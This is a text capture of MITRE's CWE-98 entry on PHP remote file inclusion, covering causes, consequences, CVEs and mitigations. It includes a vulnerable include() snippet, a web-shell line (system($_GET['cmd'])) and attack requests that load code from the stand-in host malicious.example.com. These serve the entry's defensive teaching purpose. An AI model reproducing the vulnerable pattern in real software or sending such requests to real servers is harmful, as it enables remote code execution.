3/7/24, 3:13 PM CWE - CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote…
https://cwe.mitre.org/data/deﬁnitions/98.html 1/5
Common W eakness Enumeration
A community-developed list of SW & HW weaknesses that can become
vulnerabilities
Home Search
CWE-98: Improper Control of Filename for Include/Require Statement in PHP
Program ('PHP Remote File Inclusion')
Weakness ID: 98
Vulnerability Mapping: 
View customized information:
 Description
The PHP application receives input from an upstream component, but it does not restrict or incorrectly restricts the input before its
usage in "require," "include," or similar functions.
 Extended Description
In certain versions and configurations of PHP , this can allow an attacker to specify a URL to a remote location from which the product
will obtain the code to execute. In other cases in association with path traversal, the attacker can specify a local file that may contain
executable statements that can be parsed by PHP .
 Alternate T erms
Remote file include
RFI: The Remote File Inclusion (RFI) acronym is often used by vulnerability researchers.
Local file inclusion: This term is frequently used in cases in which remote download is disabled, or when the first part of the
filename is not under the attacker's control, which forces use of relative path traversal ( CWE-23 ) attack
techniques to access files that may contain previously-injected PHP code, such as web access logs.
 Relationships
 Relevant to the view "Research Concepts" (CWE-1000)
Nature Type ID Name
ChildOf 706 Use of Incorrectly-Resolved Name or Reference
ChildOf 829 Inclusion of Functionality from Untrusted Control Sphere
CanAlsoBe 426 Untrusted Search Path
CanFollow 73 External Control of File Name or Path
CanFollow 184 Incomplete List of Disallowed Inputs
CanFollow 425 Direct Request ('Forced Browsing')
CanFollow 456 Missing Initialization of a V ariable
CanFollow 473 PHP External V ariable Modification
CanPrecede 94 Improper Control of Generation of Code ('Code Injection')
 Relevant to the view "Architectural Concepts" (CWE-1008)
 Modes Of Introduction
Phase Note
Implementation REALIZA TION: This weakness is caused during implementation of an architectural security tactic.
 Applicable Platforms
Languages
PHP (Often Prevalent)
 Common Consequences
Scope Impact Likelihood
Integrity
Confidentiality
AvailabilityTechnical Impact: Execute Unauthorized Code or Commands
The attacker may be able to specify arbitrary code to be executed from a remote location.
Alternatively , it may be possible to use normal program behavior to insert php code into files on the
local machine which can then be included and force the code to execute since php ignores
everything in the file except for the content between php specifiers.
 Likelihood Of Exploit
HighAbout ▼ CWE List ▼ Mapping ▼ Top-N Lists ▼ Community ▼ News ▼
ALLOWED
Abstraction: Variant
Conceptual OperationalMapping
FriendlyComplete Custom
3/7/24, 3:13 PM CWE - CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote…
https://cwe.mitre.org/data/deﬁnitions/98.html 2/5
 Demonstrative Examples
Example 1
The following code, victim.php, attempts to include a function contained in a separate PHP page on the server . It builds the path to the
file by using the supplied 'module\_name' parameter and appending the string '/function.php' to it.
The problem with the above code is that the value of $dir is not restricted in any way , and a malicious user could manipulate the
'module\_name' parameter to force inclusion of an unanticipated file. For example, an attacker could request the above PHP page
(example.php) with a 'module\_name' of "http://malicious.example.com" by using the following request string:
Upon receiving this request, the code would set 'module\_name' to the value "http://malicious.example.com" and would attempt to
include http://malicious.example.com/function.php, along with any malicious code it contains.
For the sake of this example, assume that the malicious version of function.php looks like the following:
An attacker could now go a step further in our example and provide a request string as follows:
The code will attempt to include the malicious function.php file from the remote site. In turn, this file executes the command specified
in the 'cmd' parameter from the query string. The end result is an attempt by tvictim.php to execute the potentially malicious
command, in this case:
Note that the above PHP example can be mitigated by setting allow\_url\_fopen to false, although this will not fully protect the code.
See potential mitigations.
 Observed Examples
Reference Description
CVE-2004-0285 Modification of assumed-immutable configuration variable in include file allows file inclusion via direct
request.
CVE-2004-0030 Modification of assumed-immutable configuration variable in include file allows file inclusion via direct
request.
CVE-2004-0068 Modification of assumed-immutable configuration variable in include file allows file inclusion via direct
request.
CVE-2005-2157 Modification of assumed-immutable configuration variable in include file allows file inclusion via direct
request.
CVE-2005-2162 Modification of assumed-immutable configuration variable in include file allows file inclusion via direct
request.
CVE-2005-2198 Modification of assumed-immutable configuration variable in include file allows file inclusion via direct
request.
CVE-2004-0128 Modification of assumed-immutable variable in configuration script leads to file inclusion.
CVE-2005-1864 PHP file inclusion.
CVE-2005-1869 PHP file inclusion.
CVE-2005-1870 PHP file inclusion.
CVE-2005-2154 PHP local file inclusion.
CVE-2002-1704 PHP remote file include.
CVE-2002-1707 PHP remote file include.
CVE-2005-1964 PHP remote file include.
CVE-2005-1681 PHP remote file include.
CVE-2005-2086 PHP remote file include.
CVE-2004-0127 Directory traversal vulnerability in PHP include statement.
CVE-2005-1971 Directory traversal vulnerability in PHP include statement.
CVE-2005-3335 PHP file inclusion issue, both remote and local; local include uses ".." and "%00" characters as a
manipulation, but many remote file inclusion issues probably have this vector .(bad code) Example Language: PHP 
$dir = $\_GET['module\_name'];
include($dir . "/function.php");
(attack code) 
victim.php?module\_name=http://malicious.example.com
(bad code) 
system($\_GET['cmd']);
(attack code) 
victim.php?module\_name=http://malicious.example.com&cmd=/bin/ls%20-l
(attack code) 
/bin/ls -l3/7/24, 3:13 PM CWE - CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote…
https://cwe.mitre.org/data/deﬁnitions/98.html 3/5CVE-2009-1936 chain: library file sends a redirect if it is directly requested but continues to execute, allowing remote file
inclusion and path traversal.
 Potential Mitigations
Phase: Architecture and Design
Strategy: Libraries or Frameworks
Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness
easier to avoid.
Phase: Architecture and Design
Strategy: Enforcement by Conversion
When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input
values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI
AccessReferenceMap [ REF-185 ] provide this capability .
Phase: Architecture and Design
For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in
order to avoid CWE-602 . Attackers can bypass the client-side checks by modifying values after the checks have been
performed, or by changing the client to remove the client-side checks entirely . Then, these modified values would be submitted
to the server .
Phases: Architecture and Design; Operation
Strategy: Sandbox or Jail
Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating
system. This may ef fectively restrict which files can be accessed in a particular directory or which commands can be executed
by the software.
OS-level examples include the Unix chroot jail, AppArmor , and SELinux. In general, managed code may provide some
protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file
operations.
This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be
subject to compromise.
Be careful to avoid CWE-243 and other weaknesses related to jails.
Effectiveness: Limited
Note: The ef fectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and
might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of
the file system that can be accessed.
Phases: Architecture and Design; Operation
Strategy: Environment Hardening
Run your code using the lowest privileges that are required to accomplish the necessary tasks [ REF-76 ]. If possible, create
isolated accounts with limited privileges that are only used for a single task. That way , a successful attack will not immediately
give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as
the database administrator , especially in day-to-day operations.
Phase: Implementation
Strategy: Input V alidation
Assume all input is malicious. Use an "accept known good" input validation strategy , i.e., use a list of acceptable inputs that
strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something
that does.
When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of
acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an
example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not
valid if the input is only expected to contain colors such as "red" or "blue."
Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input,
especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However ,
denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected
outright.
When validating filenames, use stringent lists that limit the character set to be used. If feasible, only allow a single "." character
in the filename to avoid weaknesses such as CWE-23 , and exclude directory separators such as "/" to avoid CWE-36 . Use a list
of allowable file extensions, which will help to avoid CWE-434 .
Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist,
which may be incomplete ( CWE-184 ). For example, filtering "/" is insuf ficient protection if the filesystem also supports the use of
"\" as a directory separator . Another possible error could occur when the filtering is applied in a way that still produces dangerous
data ( CWE-182 ). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of
"../" would be removed from the original string, but the remaining characters would still form the "../" string.
Effectiveness: High
Phases: Architecture and Design; Operation3/7/24, 3:13 PM CWE - CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote…
https://cwe.mitre.org/data/deﬁnitions/98.html 4/5Strategy: Attack Surface Reduction
Store library , include, and utility files outside of the web document root, if possible. Otherwise, store them in a separate directory
and use the web server's access control capabilities to prevent attackers from directly requesting them. One common practice is
to define a fixed constant in each calling program, then check for the existence of the constant in the library/include file; if the
constant does not exist, then the file was directly requested, and it can exit immediately .
This significantly reduces the chance of an attacker being able to bypass any protection mechanisms that are in the base
program but not in the include files. It will also reduce the attack surface.
Phases: Architecture and Design; Implementation
Strategy: Attack Surface Reduction
Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything
read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail,
files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be
obtained indirectly through API calls.
Many file inclusion problems occur because the programmer assumed that certain inputs could not be modified, especially for
cookies and URL components.
Phase: Operation
Strategy: Firewall
Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot
be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software
assurance measures are applied, or to provide defense in depth.
Effectiveness: Moderate
Note: An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass
the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those
inputs. Depending on functionality , an application firewall might inadvertently reject or modify legitimate requests. Finally , some
manual ef fort may be required for customization.
Phases: Operation; Implementation
Strategy: Environment Hardening
Develop and run your code in the most recent versions of PHP available, preferably PHP 6 or later . Many of the highly risky
features in earlier PHP interpreters have been removed, restricted, or disabled by default.
Phases: Operation; Implementation
Strategy: Environment Hardening
When using PHP , configure the application so that it does not use register\_globals. During implementation, develop the
application so that it does not rely on this feature, but be wary of implementing a register\_globals emulation that is subject to
weaknesses such as CWE-95 , CWE-621 , and similar issues.
Often, programmers do not protect direct access to files intended only to be included by core programs. These include files may
assume that critical variables have already been initialized by the calling program. As a result, the use of register\_globals
combined with the ability to directly access the include file may allow attackers to conduct file inclusion attacks. This remains an
extremely common pattern as of 2009.
Phase: Operation
Strategy: Environment Hardening
Set allow\_url\_fopen to false, which limits the ability to include files from remote locations.
Effectiveness: High
Note: Be aware that some versions of PHP will still accept ftp:// and other URI schemes. In addition, this setting does not protect
the code from path traversal attacks ( CWE-22 ), which are frequently successful against the same vulnerable code that allows
remote file inclusion.
 Detection Methods
Manual Analysis
Manual white-box analysis can be very ef fective for finding this issue, since there is typically a relatively small number of include
or require statements in each program.
Effectiveness: High
Automated Static Analysis
The external control or influence of filenames can often be detected using automated static analysis that models data flow within
the product.
Automated static analysis might not be able to recognize when proper input validation is being performed, leading to false
positives - i.e., warnings that do not have any security consequences or require any code changes. If the program uses a
customized input validation library , then some tools may allow the analyst to create custom signatures to detect usage of those
routines.
 Affected Resources
File or Directory3/7/24, 3:13 PM CWE - CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote…
https://cwe.mitre.org/data/deﬁnitions/98.html 5/5
 Memberships
Nature Type ID Name
MemberOf 714 OWASP Top Ten 2007 Category A3 - Malicious File Execution
MemberOf 727 OWASP Top Ten 2004 Category A6 - Injection Flaws
MemberOf 802 2010 Top 25 - Risky Resource Management
MemberOf 1347 OWASP Top Ten 2021 Category A03:2021 - Injection
MemberOf 1416 Comprehensive Categorization: Resource Lifecycle Management
 Vulnerability Mapping Notes
Usage: ALLOWED (this CWE ID could be used to map to real-world vulnerabilities)
Reason: Acceptable-Use
Rationale:
This CWE entry is at the V ariant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of
vulnerabilities.
Comments:
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a
lower-level Base/V ariant simply to comply with this preferred level of abstraction.
 Notes
Relationship
This is frequently a functional consequence of other weaknesses. It is usually multi-factor with other factors (e.g. MAID), although
not all inclusion bugs involve assumed-immutable data. Direct request weaknesses frequently play a role.
Can overlap directory traversal in local inclusion problems.
 Taxonomy Mappings
Mapped T axonomy Name Node ID Fit Mapped Node Name
PLOVER PHP File Include
OWASP Top Ten 2007 A3 CWE More Specific Malicious File Execution
WASC 5 Remote File Inclusion
 Related Attack Patterns
CAPEC-ID Attack Pattern Name
CAPEC-193 PHP Remote File Inclusion
 References
[REF-185] OW ASP. "Testing for Path Traversal (OW ASP-AZ-001)".
.
[REF-76] Sean Barnum and Michael Gegick. "Least Privilege". 2005-09-14.
. URL
validated: 2023-04-07 .
[REF-951] Shaun Clowes. "A Study in Scarlet". < https://www .cgisecurity .com/lib/studyinscarlet.txt >. URL validated: 2023-04-07 .
[REF-952] Stefan Esser . "Suhosin". < http://www .hardened-php.net/suhosin/ >.
[REF-953] Johannes Ullrich. "T op 25 Series - Rank 13 - PHP File Inclusion". SANS Software Security Institute. 2010-03-11.
. URL validated: 2023-04-07 .
 Content History
 Submissions
Submission Date Submitter Organization
2006-07-19
(CWE Draft 3, 2006-07-19)PLOVER
 Modifications
 Previous Entry Names
